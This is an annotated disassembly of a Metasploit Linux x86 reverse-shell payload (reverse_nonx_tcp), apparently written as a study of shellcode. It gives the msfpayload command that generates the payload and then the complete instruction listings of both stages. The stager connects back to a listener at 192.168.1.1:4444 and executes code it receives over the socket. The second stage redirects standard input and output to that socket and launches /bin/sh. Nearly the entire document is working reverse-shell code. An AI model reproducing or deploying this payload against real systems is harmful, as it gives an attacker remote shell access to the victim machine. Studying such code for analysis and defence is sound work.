reverse_nonx_tcp.rb
root@xstpl:~# msfpayload linux/x86/shell/reverse_nonx_tcp LHOST=192.168.1.1 LPORT=4444 R > reverse_nonx_tcp.bin
root@xstpl:~# ndisasm -b32 -p intel reverse_nonx_tcp.bin
; Stage 1 (stager): socket() + connect() back to LHOST:LPORT, then read() stage 2 from the
; socket onto the stack and jump into it. i386 Linux, int 0x80 ABI: eax = syscall number,
; ebx/ecx/edx = args. No syscall return value is checked anywhere in this stage.
00000000 31DB xor ebx,ebx ; ebx = 0
00000002 53 push ebx ; protocol = 0
00000003 43 inc ebx ; ebx = 1; int socket(int domain, int type, int protocol);
00000004 53 push ebx ; type = SOCK_STREAM (1)
00000005 6A02 push byte +0x2 ; domain = AF_INET (2) -- not AF_UNIX, which is 1
00000007 6A66 push byte +0x66 ; 0x66 = 102 = __NR_socketcall; int socketcall(int call, unsigned long *args);
00000009 58 pop eax ; eax = 0x66 (socketcall); ebx = 1 = call SYS_SOCKET
0000000A 89E1 mov ecx,esp ; args = {domain, type, protocol} on the stack
0000000C CD80 int 0x80 ; eax = socket(AF_INET, SOCK_STREAM, 0); negative on failure, not checked
0000000E 97 xchg eax,edi ; edi = socket descriptor (kept in edi for the rest of stage 1 and stage 2)
0000000F 5B pop ebx ; ebx = 2 (the AF_INET value pushed above); reused below as sin_family and as the base of the connect call number
; struct sockaddr_in { short sin_family; unsigned short sin_port; struct in_addr sin_addr; char sin_zero[8]; };
; struct in_addr { unsigned long s_addr; };
; The struct is built by pushing its fields in reverse order so that esp ends up at sin_family.
; Only the first 8 bytes are written; sin_zero is whatever is already on the stack.
00000010 68C0A80101 push dword 0x101a8c0 ; sin_addr = 192.168.1.1 (bytes c0 a8 01 01 in memory = LHOST)
00000015 6668115C push word 0x5c11 ; sin_port = htons(4444) = 0x115c (bytes 11 5c in memory = LPORT)
00000019 6653 push bx ; sin_family = AF_INET (2)
0000001B 89E1 mov ecx,esp ; ecx = &sockaddr_in
0000001D 6A66 push byte +0x66 ; int socketcall(int call, unsigned long *args);
0000001F 58 pop eax ; eax = 0x66 (socketcall)
00000020 50 push eax ; addrlen = 0x66 (eax reused as a larger-than-needed length)
00000021 51 push ecx ; addr = &sockaddr_in
00000022 57 push edi ; sockfd
00000023 89E1 mov ecx,esp ; args = {sockfd, addr, addrlen} for socketcall
00000025 43 inc ebx ; ebx = 3 = call SYS_CONNECT; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
00000026 CD80 int 0x80 ; eax = connect(...); 0 on success, negative on failure (not checked)
00000028 5B pop ebx ; ebx = sockfd (first of the three args just pushed)
00000029 99 cdq ; edx = sign-extension of eax (EAX, not AX): 0 only if connect returned 0
0000002A B60C mov dh,0xc ; edx = 0x0c00 = 3072 = count
0000002C B003 mov al,0x3 ; eax = 3 = __NR_read, assuming eax was 0 from a successful connect; ssize_t read(int fd, void *buf, size_t count);
0000002E CD80 int 0x80 ; read(sockfd, esp, 3072): stage 2 is received directly into the stack buffer at ecx = esp
00000030 FFE1 jmp ecx ; execute whatever bytes were read, from the stack: no length or content validation, and this requires an executable stack
-------------------------------------------------------------------------------------------------------------------------------------------------------------
Stage 2 - obtained using gdb
-------------------------------------------------------------------------------------------------------------------------------------------------------------
; Stage 2: dup2() the socket over fds 2, 1, 0, then execve("/bin//sh") so the shell's
; stdin/stdout/stderr are the connected socket. Runs with edi still holding the sockfd from stage 1.
00000000 mov ebx,edi ; ebx = oldfd = sockfd (kept in edi by stage 1)
00000002 push 0x2 ; ecx = newfd, counting 2 -> 1 -> 0 (stderr, stdout, stdin)
00000004 pop ecx ; loop counter; decremented until every std fd has been duplicated
00000005 push 0x3f ; 0x3f = 63 = __NR_dup2; int dup2(int oldfd, int newfd); (loop re-enters here, so eax is reloaded each iteration)
00000007 pop eax ; eax = __NR_dup2; dup2() makes newfd a copy of oldfd
00000008 int 0x80 ; dup2(sockfd, ecx): redirect this std fd to the socket; result not checked
0000000a dec ecx ; next lower std fd
0000000b jns 000000005 ; loop while ecx >= 0; falls through once ecx = -1 (SF set)
0000000d push 0xb ; 0xb = 11 = __NR_execve; int execve(const char *filename, char *const argv[], char *const envp[]);
0000000f pop eax ; eax = __NR_execve; execve() replaces the process image with the program at filename
00000010 cdq ; edx = 0 (sign-extension of eax = 11)
00000011 push edx ; NUL terminator for the filename string
00000012 push 0x68732f2f ; "//sh" as stored in memory (bytes 2f 2f 73 68)
00000017 push 0x6e69622f ; "/bin" as stored in memory (bytes 2f 62 69 6e)
0000001c mov ebx,esp ; filename = "/bin//sh" (double slash avoids a NUL byte in the 8-byte string)
0000001e push edx ; argv[1] = NULL (envp itself is passed in edx = NULL)
0000001f push ebx ; argv[0] = filename
00000020 mov ecx,esp ; ecx = argv = {"/bin//sh", NULL}
00000022 int 0x80 ; execve("/bin//sh", argv, NULL): the resulting shell is bound to the socket; only returns on failure